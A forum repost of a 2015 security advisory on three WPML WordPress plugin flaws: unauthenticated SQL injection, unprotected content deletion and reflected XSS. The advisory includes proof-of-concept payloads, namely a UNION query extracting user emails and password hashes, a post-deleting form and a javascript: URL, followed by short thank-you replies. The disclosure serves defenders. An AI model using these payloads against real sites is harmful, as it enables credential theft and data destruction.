楼主: 90_

WordPress WPML插件多个漏洞

[复制链接]
  • TA的每日心情

    2024-12-14 22:22
  • 签到天数: 1631 天

    [LV.Master]伴坛终老

    发表于 2015-3-15 12:52:05 | 显示全部楼层 |阅读模式
    [AppleScript] 纯文本查看 复制代码
    OVERVIEW
    ==========
     
    WPML is the industry standard for creating multi-lingual WordPress
    sites. Three vulnerabilities were found in the plug-in. The most
    serious of them, an SQL injection problem, allows anyone to read the
    contents of the WordPress database, including user details and
    password hashes, without authentication.
     
    System administrators should update to version 3.1.9.1 released
    earlier this week to resolve the issues.
     
     
     
    DETAILS
    ========
     
    1. SQL injection
     
    When WPML processed a HTTP POST request containing the parameter
    ”action=wp-link-ajax”, the current language is determined by parsing
    the HTTP referer. The parsed language code is not checked for
    validity, nor SQL-escaped. The user doesn’t need to be logged in.
     
    By sending a carefully crafted referer value with the mentioned POST
    request parameter, an attacker can perform SQL queries on arbitrary
    tables and retrieve their results. In addition to the standard
    WordPress database and tables, the attacker may query all other
    databases and tables accessible to the web backend.
     
    The following HTML snippet demonstrates the vulnerability:
     
    <script>
    var union="select
    user_login,1,user_email,2,3,4,5,6,user_pass,7,8,9,10,11,12 from
    wp_users";
    if (document.location.search.length < 2)
            document.location.search="lang=xx' UNION "+union+" -- -- ";
    </script>
     
    <form method=POST action="http://www.ihonker.org/comments/feed">
    <input type=hidden name=action value="wp-link-ajax">
    <input type=submit>
    </form>
     
    The results of the SQL query will be shown in the comments feed XML-formatted.
     
     
     
    2. Page/post/menu deletion
     
    WPML contains a ”menu sync” function which helps site administrators
    to keep WordPress menus consistent across different languages. This
    functionality lacked any access control, allowing anyone to delete
    practically all content of the website - posts, pages, and menus.
     
    Example:
     
    <form method=POST
    action="http://www.ihonker.org/?page=sitepress-multilingual-cms/menu/menus-sync.php">
    <input type=hidden name="action" value="icl_msync_confirm">
    <input type=text name="sync" size=50 value="del[x][y][12345]=z">
    <input type=submit>
    </form>
     
    Submitting the above form would delete the row with the ID 12345 in
    the wp_posts database. Several items be deleted with the same request.
     
     
     
    3. Reflected XSS
     
    The ”reminder popup” code intended for administrators in WPML didn’t
    check for login status or nonce. An attacker can direct target users
    to an URL like:
     
    [url]http://www.ihonker.org/?icl_action=reminder_popup&target=javascript%3Aalert%28%2Fhello+world%2f%29%3b%2f%2f[/url]
     
     
    to execute JavaScript in their browser. This example bypasses the
    Chrome XSS Auditor.
     
    In the case of WordPress, XSS triggered by an administrator can lead
    to server-side compromise via the plugin and theme editors.
     
     
     
    CREDITS
    ========
     
    The vulnerabilities were found by Jouko Pynnonen of Klikki Oy while
    researching WordPress plugins falling in the scope of the Facebook bug
    bounty program.
     
    The vendor was notified on March 02, 2015 and the patch was released
    on March 10.
     
    Vendor advisory: [url]http://wpml.org/2015/03/wpml-security-update-bug-and-fix/[/url]
     
    An up-to-date version of this document can be found on our website
    [url]http://klikki.fi[/url] .
     
     [2015-03-15]  #
    回复

    使用道具 举报

  • TA的每日心情
    慵懒
    2022-4-16 15:45
  • 签到天数: 247 天

    [LV.8]以坛为家I

    发表于 2015-3-15 13:01:38 | 显示全部楼层
    感谢分享。
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-27 20:38:12 | 显示全部楼层
    学习学习技术,加油!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-28 01:49:01 | 显示全部楼层
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-30 09:22:12 | 显示全部楼层
    支持中国红客联盟(ihonker.org)
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-7-1 03:59:06 | 显示全部楼层
    支持,看起来不错呢!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-7-1 15:32:50 | 显示全部楼层
    支持中国红客联盟(ihonker.org)
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-7-1 19:27:09 | 显示全部楼层
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2015-6-21 22:12
  • 签到天数: 1 天

    [LV.1]初来乍到

    发表于 2015-7-2 18:06:06 | 显示全部楼层
    感谢楼主的分享~
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2019-2-12 22:05
  • 签到天数: 2 天

    [LV.1]初来乍到

    发表于 2015-7-3 12:58:22 | 显示全部楼层
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-23 05:02 , Processed in 0.037096 second(s), 13 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部